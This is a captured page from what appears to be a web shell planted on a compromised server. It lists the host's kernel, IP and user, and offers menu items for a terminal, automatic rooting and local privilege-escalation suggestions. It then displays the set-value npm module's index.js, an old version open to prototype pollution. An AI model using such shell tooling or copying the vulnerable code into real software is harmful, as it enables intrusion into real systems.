Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.135.246.88
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
set-value /
Delete
Unzip
Name
Size
Permission
Date
Action
node_modules
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
LICENSE
1.06
KB
-rw-r--r--
2015-05-12 07:26
README.md
6.3
KB
-rw-r--r--
2017-06-21 05:47
index.js
1.04
KB
-rw-r--r--
2017-06-21 05:44
package.json
2.5
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
/*! * set-value <https://github.com/jonschlinkert/set-value> * * Copyright (c) 2014-2015, 2017, Jon Schlinkert. * Released under the MIT License. */ 'use strict'; var split = require('split-string'); var extend = require('extend-shallow'); var isPlainObject = require('is-plain-object'); var isObject = require('is-extendable'); module.exports = function(obj, prop, val) { if (!isObject(obj)) { return obj; } if (Array.isArray(prop)) { prop = [].concat.apply([], prop).join('.'); } if (typeof prop !== 'string') { return obj; } var keys = split(prop, {sep: '.', brackets: true}); var len = keys.length; var idx = -1; var current = obj; while (++idx < len) { var key = keys[idx]; if (idx !== len - 1) { if (!isObject(current[key])) { current[key] = {}; } current = current[key]; continue; } if (isPlainObject(current[key]) && isPlainObject(val)) { current[key] = extend({}, current[key], val); } else { current[key] = val; } } return obj; };